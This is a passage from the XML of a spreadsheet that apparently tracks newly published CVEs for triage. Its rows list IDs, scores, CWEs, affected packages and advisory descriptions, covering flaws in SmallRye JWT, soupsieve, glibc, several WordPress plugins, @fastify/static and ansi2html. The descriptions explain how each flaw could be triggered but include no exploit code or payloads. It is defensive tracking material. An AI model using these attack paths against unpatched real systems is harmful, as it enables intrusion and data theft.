    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81829</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in SmallRye JWT's AwsAlbKeyResolver, which is used by applications to verify JSON Web Tokens signed by AWS Application Load Balancers. When the AWS_ALB key provider is configured, the resolver constructs the key-fetch URL by directly concatenating the attacker-controlled kid header value from an inbound JWT without sanitizing path traversal characters or query-string separators. This allows an unauthenticated remote attacker to force the application server to issue GET requests to arbitrary paths on the same origin as the configured key endpoint. As a result, non-public endpoints or internal data reachable on that origin may be read by the attacker before JWT signature verification takes place.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81829</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85999</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr">
        <is>
          <t>pip:soupsieve</t>
        </is>
      </c>
      <c r="M329" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>Soup Sieve is a CSS selector library designed to be used with Beautiful Soup 4. Prior to 2.9, selector_iter in src/soupsieve/css_parser.py trims the raw selector with RE_WS_END, an end-anchored WSC whitespace-and-comment expression used with search(), so the regular expression engine retries a greedy scan at every starting offset. An attacker-controlled valid selector containing a long internal whitespace run, or a selector containing a long CSS comment run followed by another token, causes quadratic CPU work before tokenization. User-controlled selectors can reach the path through soupsieve.compile() and BeautifulSoup.select(), while applications using only hard-coded selectors are unaffected. This root cause is separate from the IDENTIFIER and VALUE backtracking vulnerability because the cost occurs in RE_WS_END.search during trimming rather than token matching. The resulting CPU consumption can hold the Python GIL, exhaust workers, and stall a service without causing memory corruption or code execution. The issue is fixed in version 2.9.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85999</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86000</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr">
        <is>
          <t>pip:soupsieve</t>
        </is>
      </c>
      <c r="M330" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>Soup Sieve is a CSS selector library designed to be used with Beautiful Soup 4. Prior to 2.9, the selector parser in src/soupsieve/css_parser.py defines IDENTIFIER with adjacent quantified groups over overlapping character classes, and VALUE embeds IDENTIFIER for attribute selectors. When an attacker-controlled selector contains a long identifier or unquoted attribute-value run followed by input that makes the overall match fail, the regular expression engine explores quadratically many splits between the overlapping groups. User-controlled selectors can reach this path through soupsieve.compile(), soupsieve.select(), or BeautifulSoup.select(), while applications using only hard-coded selectors are unaffected. The resulting CPU consumption can hold the Python GIL, exhaust application workers, and stall a service; successful plain identifier matches are linear, and the issue does not cause memory corruption or code execution. The issue is fixed in version 2.9.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86000</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8674</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>3ff69d7a-14f2-4f67-a097-88dee7810d18</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>Initializing the DNS stub resolver from an /etc/resolv.conf file, or a LOCALDOMAIN environment variable, whose search list contains a domain of roughly 200 characters or more in the GNU C Library version 2.26 to 2.44 results in an assertion failure which aborts the process.
The resolver truncates the search list when copying it into the fixed-size _res.defdname buffer, then asserts that the copy is consistent with the full configuration.  The consistency check compared against the wrong size and did not handle a first entry that does not fit, so a correctly truncated list failed the assertion.  Any process that resolves names through the library is affected, including long-running processes that reload /etc/resolv.conf on the next query after it changes.  Search domains are commonly written to /etc/resolv.conf from data received over DHCP or from a VPN server, so an attacker on the local network may be able to trigger this without privileges on the target system, subject to validation by the network configuration software.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8674</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89064</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to Insufficient Credential Protection in versions up to, and including, 7.110. This is due to the `Ai1wm_Main_Controller::init()` method — registered on the `admin_init` hook, which fires unauthenticated on `admin-ajax.php` and `admin-post.php` requests — reading `$_SERVER['PHP_AUTH_USER']` and `$_SERVER['PHP_AUTH_PW']` from any incoming request and writing them to the `ai1wm_auth_header` option via `update_option()` as a reversible base64-encoded string, with no capability check, nonce verification, `is_user_logged_in()` check, or confirmation that Basic authentication actually succeeded. This makes it possible for unauthenticated attackers to capture into the database, in reversible base64 form, any WordPress Application Password or HTTP Basic credential presented to `/wp-admin/` by a legitimate integration, or to overwrite the stored credential with an attacker-chosen value by sending an anonymous request carrying a crafted `Authorization: Basic` header. This is particularly impactful in environments using WordPress Application Passwords for REST API or third-party integrations, as those credentials are transmitted as HTTP Basic auth to `/wp-admin/` and will be silently harvested via this unauthenticated write path.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89064</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90922</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>The Paid Membership Subscriptions  WordPress plugin before 3.0.9 does not verify that the amount and currency reported by the payment provider match the pending payment before completing it, allowing unauthenticated users to obtain a paid membership by paying an arbitrary lower amount.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90922</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90982</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-284</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>@fastify/static is a Fastify plugin that serves static files from a configured root directory. In versions before 10.1.4, on a case-insensitive filesystem such as Windows or the default macOS volume, a route guard or allowedPath restriction can be bypassed by altering the letter case of a path segment. The route matcher is case-sensitive while the filesystem is not, so a request that changes the case of a protected segment does not match the guarded route and falls through to the static handler, yet the filesystem resolves it to the same protected file. As a result, an unauthenticated request can read a file that a route guard or allowedPath was configured to protect. The issue does not affect case-sensitive filesystems and is not a directory traversal, since nothing is served from outside the configured root. The issue is fixed in @fastify/static 10.1.4, which validates the requested path against its actual on-disk spelling and rejects case-aliased paths before authorization. As a workaround, serve static files from a case-sensitive filesystem, or ensure route guards and allowedPath rules account for every letter-case variant of the protected paths.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90982</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91015</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>The Master Addons for Elementor  WordPress plugin before 3.1.9 does not perform an authorization check on the AJAX action that deactivates its Popup Builder popups, relying only on a nonce that is publicly output to every visitor, allowing unauthenticated attackers to permanently disable any popup on the site.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91015</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91016</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>The Motors  WordPress plugin before 1.4.121 does not verify that a request is authorized to view a user's non-published listings before returning them, allowing unauthenticated attackers to read any author's draft, pending and private car listings - including titles, prices, media URLs and seller notes - by supplying only the target's numeric user id.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91016</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92879</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in vgmstream up to r2117. This issue affects the function parse_mus of the file src/meta/mus_acm.c. The manipulation results in resource consumption. The attack may be launched remotely. The patch is identified as ae37662ad626254ddd96ad69ac263792d7a92024. Applying a patch is advised to resolve this issue.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92879</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92920</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>admin3 through 3.0.0 fails to invalidate existing sessions when disabling a user account, allowing attackers to retain authenticated access with original permissions. Attackers can continue using bearer tokens issued before account disablement to authenticate requests, as the AuthInterceptor never re-validates the user's locked status and session expiry resets on each request.</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92920</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92927</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Drug Recommendation System 1.0. This issue affects some unknown processing of the file /db/drug_recommendor.sql. Performing a manipulation results in information disclosure. The attack is possible to be carried out remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92927</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92963</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-227</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>vm2 versions before 3.11.2 fail to properly restrict access to the VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL global variable. Attackers can access this internal state object through globalThis to retrieve sensitive sandbox internals.</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92963</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92973</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>ansi2html versions 1.7.0a0 through 1.9.3 contain a cross-site scripting vulnerability in OSC 8 hyperlink handling that fails to validate or escape URL targets. Attackers controlling ANSI text input can inject javascript: schemes or terminate href attributes to execute arbitrary scripts in the context of pages displaying converted output.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92973</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53555</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
